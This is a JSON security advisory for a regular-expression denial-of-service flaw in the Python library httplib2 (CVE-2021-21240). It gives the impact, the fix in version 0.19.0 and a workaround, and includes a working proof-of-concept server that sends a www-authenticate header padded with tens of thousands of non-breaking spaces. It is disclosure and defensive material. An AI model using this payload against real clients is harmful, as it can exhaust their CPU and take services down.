{"id":"GHSA-93xj-8mrv-444m","summary":"Regular Expression Denial of Service (REDoS) in httplib2","details":"### Impact\nA malicious server which responds with long series of `\\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.\n\n### Patches\nVersion 0.19.0 contains new implementation of auth headers parsing, using pyparsing library.\nhttps://github.com/httplib2/httplib2/pull/182\n\n### Workarounds\n```py\nimport httplib2\nhttplib2.USE_WWW_AUTH_STRICT_PARSING = True\n```\n\n### Technical Details\n\nThe vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338\n\nThe section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:\n\n    \\s*[^ \\t\\r\\n=]+\\s*=\n\nSince all three infinitely repeating groups accept the non-breaking space character `\\xa0`, a long string of `\\xa0` causes catastrophic backtracking.\n\nThe complexity is cubic, so doubling the length of the malicious string of `\\xa0` makes processing take 8 times as long.\n\n### Reproduction Steps\n\nRun a malicious server which responds with\n\n    www-authenticate: x \\xa0\\xa0\\xa0\\xa0x\n\nbut with many more `\\xa0` characters.\n\nAn example malicious python server is below:\n\n```py\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef make_header_value(n_spaces):\n    repeat = \"\\xa0\" * n_spaces\n    return f\"x {repeat}x\"\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.log_request(401)\n        self.send_response_only(401)  # Don't bother sending Server and Date\n        n_spaces = (\n            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences\n            if len(self.path) \u003e 1 else\n            65512  # Max header line length 65536\n        )\n        value = make_header_value(n_spaces)\n        self.send_header(\"www-authenticate\", value)  # This header can actually be sent multiple times\n        self.end_headers()\n\nif __name__ == \"__main__\":\n    HTTPServer((\"\", 1337), Handler).serve_forever()\n```\n\nConnect to the server with httplib2:\n\n```py\nimport httplib2\nhttplib2.Http(\".cache\").request(\"http://localhost:1337\", \"GET\")\n```\n\nTo benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000\n\n\n### References\nThanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2021-01](mailto:temotor@gmail.com)","aliases":["CVE-2021-21240","PYSEC-2021-16"],"modified":"2026-03-13T22:15:17.171855Z","published":"2021-02-08T19:41:59Z","related":["CVE-2021-21240"],"database_specific":{"severity":"HIGH","github_reviewed_at":"2021-02-08T19:41:34Z","nvd_published_at":"2021-02-08T20:15:00Z","cwe_ids":["CWE-400"],"github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-21240"},{"type":"WEB","url":"https://github.com/httplib2/httplib2/pull/182"},{"type":"WEB","url":"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"},{"type":"PACKAGE","url":"https://github.com/httplib2/httplib2"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2021-16.yaml"},{"type":"WEB","url":"https://pypi.org/project/httplib2"}],"affected":[{"package":{"name":"httplib2","ecosystem":"PyPI","purl":"pkg:pypi/httplib2"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"0.19.0"}]}],"versions":["0.10.3","0.11.0","0.11.1","0.11.3","0.12.0","0.12.1","0.12.3","0.13.0","0.13.1","0.14.0","0.15.0","0.16.0","0.17.0","0.17.1","0.17.2","0.17.3","0.17.4","0.18.0","0.18.1","0.7.0","0.7.1","0.7.2","0.7.3","0.7.4","0.7.5","0.7.6","0.7.7","0.8","0.9","0.9.1","0.9.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-93xj-8mrv-444m/GHSA-93xj-8mrv-444m.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"}]}